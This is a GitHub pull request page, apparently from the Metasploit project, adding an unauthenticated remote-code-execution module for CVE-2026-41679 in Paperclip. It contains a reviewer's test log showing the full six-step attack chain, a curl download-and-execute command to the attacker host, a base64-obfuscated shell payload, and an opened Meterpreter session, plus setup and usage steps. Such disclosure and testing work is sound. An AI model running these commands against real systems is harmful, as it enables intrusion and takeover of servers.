Paperclip unauthenticated RCE [CVE-2026-41679]#21547
Merged
Merged
Conversation
jheysel-r7
reviewed
Jun 10, 2026
jheysel-r7
left a comment
Contributor
There was a problem hiding this comment.
Thanks @h00die-gr3y, this looks great. Setup was a breeze and testing was as expected. Just a couple minor comments:
msf exploit(linux/http/paperclipai_unauth_rce_cve_2026_41679) > run
[*] Command to run on remote host: curl -so ./XKJoWJYLU http://172.16.199.1:8080/Hn-8qIL46e0vZdQpIHPToA;chmod +x ./XKJoWJYLU;./XKJoWJYLU&
[*] Fetch handler listening on 172.16.199.1:8080
[*] HTTP server started
[*] Adding resource /Hn-8qIL46e0vZdQpIHPToA
[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Paperclip version 2026.403.0
[*] Executing Unix/Linux Command for cmd/linux/http/x64/meterpreter/reverse_tcp
[*] Step 1: sign-up and register a new user.
[+] user => judith.morris@4q3bizqu5.dtefsh.net, password => MsqPUJoAQfPVFw2k
[*] Step 2: sign-in with the new user credentials and get a session-cookie.
[+] cookie => better-auth.session_token=VfB17HpAGK5HXKz5FmjqWpIUFBqKujdA.O9CWuTP3vbZuj%2FlEkdBFt9EKze6j3bgvtnLoeduPU7Q%3D;
[*] Step 3: Create a CLI challenge and generate an API token.
[+] API token => pcp_board_59ba99aa38938a33f26d3cdde997caa41f318c5f721807c8
[*] Step 4: Approve the challenge in your session.
[*] Step 5: Create a company and deploy an agent with payload via import (authorization bypass).
[+] payload => echo${IFS}Y3VybCAtc28gLi9YS0pvV0pZTFUgaHR0cDovLzE3Mi4xNi4xOTkuMTo4MDgwL0huLThxSUw0NmUwdlpkUXBJSFBUb0E7Y2htb2QgK3ggLi9YS0pvV0pZTFU7Li9YS0pvV0pZTFUm|((command${IFS}-v${IFS}base64>/dev/null&&(base64${IFS}--decode||base64${IFS}-d))||(command${IFS}-v${IFS}openssl>/dev/null&&openssl${IFS}enc${IFS}-base64${IFS}-d))|sh
[+] company_id => 632845d0-0f89-481c-ae6b-3860ba1dade5, agent_id => 501dd3a7-1b87-4b24-8f94-14e3d93d3eb6
[*] Step 6: Run the agent and trigger the payload. You should get a session now ;-).
[*] Client 172.16.199.136 requested /Hn-8qIL46e0vZdQpIHPToA
[*] Sending payload to 172.16.199.136 (curl/7.81.0)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3090404 bytes) to 172.16.199.136
[*] Meterpreter session 3 opened (172.16.199.1:4444 -> 172.16.199.136:34004) at 2026-06-10 10:46:05 -0700
[*] Cleaning up the mess...
[+] Company and agent payload has been successfully archived.
meterpreter > getuid
sServer username: msfuser
meterpreter > sysinfo
Computer : msfuser-virtual-machine
OS : Ubuntu 22.04 (Linux 6.8.0-124-generic)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter >
jheysel-r7
approved these changes
Jun 11, 2026
Contributor
Release NotesThis adds an module exploit for CVE-2026-41679 which exploits Paperclip. An unauthenticated attacker can achieve full remote code execution on any network-accessible Paperclip instance running in authenticated mode with default configuration. The entire chain is six API calls. |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.This suggestion is invalid because no changes were made to the code.Suggestions cannot be applied while the pull request is closed.Suggestions cannot be applied while viewing a subset of changes.Only one suggestion per line can be applied in a batch.Add this suggestion to a batch that can be applied as a single commit.Applying suggestions on deleted lines is not supported.You must change the existing code in this line in order to create a valid suggestion.Outdated suggestions cannot be applied.This suggestion has been applied or marked resolved.Suggestions cannot be applied from pending reviews.Suggestions cannot be applied on multi-line comments.Suggestions cannot be applied while the pull request is queued to merge.Suggestion cannot be applied right now. Please check back later.
Paperclip is the operating system for your AI company.
You set the goals, hire AI agents as employees, and watch them plan and execute work.
Prior to version
2026.410.0, Paperclip allows for an unauthenticated RCE.An unauthenticated attacker can achieve full remote code execution on any network-accessible Paperclip
instance running in authenticated mode with default configuration. The entire chain is six API calls.
The following Paperclip release has been tested:
Installation
Installation steps to install the Paperclip application
npx paperclipai@2026.403.0 onboard --yesto download, install and configure Paperclip.~/.paperclip/instances/default/config.json.{ "deploymentMode": "local_trusted" }{ "deploymentMode": "authenticated" }npx paperclipai@2026.403.0 run. It will accessibe onhttp://localhost:3100.authenticatedmode, you need to define a instance admin account before you can use the application.npx paperclipai@2026.403.0 allowed-hostname <your server ip>to configure Paperclip to use your server ip.You are now ready to test the module.
Verification Steps
msfconsoleuse exploit/linux/http/paperclipai_unauth_rce_cve_2026_41679set rhosts <ip-target>set rport <port>set lhost <attacker-ip>set target <0=Unix/Linux Command>exploityou should get a
reverse shellorMeterpretersession depending on thepayloadandtargetsettings.